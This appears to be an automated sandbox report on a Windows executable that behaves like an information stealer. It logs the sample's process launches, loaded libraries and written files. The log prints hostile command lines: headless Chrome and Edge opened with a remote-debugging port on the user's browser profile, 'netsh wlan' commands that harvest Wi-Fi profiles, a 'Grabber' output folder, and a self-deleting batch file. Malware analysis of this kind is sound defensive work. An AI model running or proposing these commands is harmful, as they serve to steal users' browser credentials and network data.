                Source: bc7EKCf.exeVirustotal: Detection: 31%
                Source: bc7EKCf.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile read: C:\Users\user\Desktop\bc7EKCf.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\bc7EKCf.exe "C:\Users\user\Desktop\bc7EKCf.exe"
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Users\user\Desktop\bc7EKCf.exe "C:\Users\user\Desktop\bc7EKCf.exe"
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-logging
                Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr All
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-logging --mojo-platform-channel-handle=2052 --field-trial-handle=2016,i,4566184230407132723,17088106052091521409,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c /C chcp 65001 && netsh wlan show networks mode=bssid
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2120 --field-trial-handle=2020,i,1680887362715709972,4906417747234883006,262144 --disable-features=PaintHolding /prefetch:3
                Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-logging --noerrdialogs --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2196 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6436 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6760 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat"
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /PID 7536
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6800 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Users\user\Desktop\bc7EKCf.exe "C:\Users\user\Desktop\bc7EKCf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-gpu --disable-loggingJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --headless=new --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-gpu --disable-loggingJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat & Del C:\Users\user\AppData\Local\Temp\tmp305C.tmp.bat"Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --disable-logging --mojo-platform-channel-handle=2052 --field-trial-handle=2016,i,4566184230407132723,17088106052091521409,262144 --disable-features=PaintHolding /prefetch:8Jump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2120 --field-trial-handle=2020,i,1680887362715709972,4906417747234883006,262144 --disable-features=PaintHolding /prefetch:3Jump to behavior
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=2196 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:3
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6436 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6760 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=7280 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --noerrdialogs --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --disable-logging --mojo-platform-channel-handle=6800 --field-trial-handle=1964,i,8074184847373783522,14194302951610338589,262144 --disable-features=PaintHolding /prefetch:8
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe TaskKill /F /PID 7536
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe Timeout /T 2 /Nobreak
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeSection loaded: websocket.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: ulib.dll
                Source: C:\Windows\SysWOW64\chcp.comSection loaded: fsutilext.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                Source: C:\Users\user\Desktop\bc7EKCf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile written: C:\Users\user\AppData\Local\66e2c348b6a124791b4c494163efaaeb\user@618321_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.iniJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\bc7EKCf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: bc7EKCf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: bc7EKCf.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: bc7EKCf.exeStatic file information: File size 3032576 > 1048576
                Source: bc7EKCf.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x2e3200
                Source: bc7EKCf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: winload_prod.pdb source: Temp.txt.2.dr
                Source: Binary string: /_/artifacts/obj/System.Memory/Release/net462/System.Memory.pdbSHA256* source: bc7EKCf.exe, 00000002.00000002.2010903453.00000000081EB000.00000004.00000020.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1985383738.0000000004119000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2008008650.0000000007C10000.00000004.08000000.00040000.00000000.sdmp
                Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmp
